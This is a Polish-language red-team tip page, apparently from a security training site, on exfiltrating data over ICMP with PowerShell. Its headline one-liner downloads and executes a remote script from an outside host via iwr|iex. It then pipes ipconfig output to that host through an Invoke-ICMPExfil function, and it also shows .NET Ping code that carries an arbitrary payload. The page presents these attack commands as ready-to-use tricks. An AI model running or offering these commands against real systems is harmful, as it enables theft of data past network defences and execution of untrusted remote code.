alphasec
PowerShell protip 000c
in 𝕏

iwr aptm.in/g/icmpex|iex; ipconfig|Invoke-ICMPExfil aptm.in - eksfiltracja danych po ICMP w Powershellu to bajka

tty1 · powershell
PS> iwr aptm.in/g/icmpex|iex; ipconfig|Invoke-ICMPExfil aptm.in
#Powershell#RedTeam#ICMP#Exfil

Żeby Powershellem wysłać pakiet ICMP z dowolnym payloadem, wystarczy skorzystać z .NETowego obiektu System.Net.NetworkInformation.Ping:

        $ICMPClient = New-Object System.Net.NetworkInformation.Ping
        $ICMPClient.Send("aptm.in", 10, ([text.encoding]::ASCII).GetBytes("Hello, APT Masterclass|FORGE!"))

i do hosta aptm.in poleci pakiet ICMP z payloadem o treści Hello, APT Masterclass|FORGE (co można potwierdzić za pomocą np. tcpdump -n -i any -AAA icmp). I wystarczą do tego uprawnienia zwykłego użytkownika. Maksymalny rozmiar payloadu ICMP to 1472, więc aż się prosi, żeby napisać prostą funkcję, która to, co chcemy wyeksfiltrowaać podzieliła na odpowiednie kawałki w razie potrzeby i.. wyeksfiltrowała.

I tak powstał Invoke-ICMPExfil, co jest wykorzystane w tym protipie.

Przydatne linki

Invoke-ICMPExfil prosta funkcja do eksfiltracji po ICMP github ↗ https://youtu.be/kh_rD-y63cE?t=879 eksfiltracja (oraz kanał C2) po ICMP w akcji video ↗
← poprzedni protip 000b ••• Wszystkie protipy następny → protip 000d
// subskrybuj

Nowe protipy prosto na maila.

Mięsiste jednolinijkowce i triki z prawdziwych zleceń. Zero spamu, zero teorii. Wypisujesz się jednym kliknięciem.

wersja newslettera: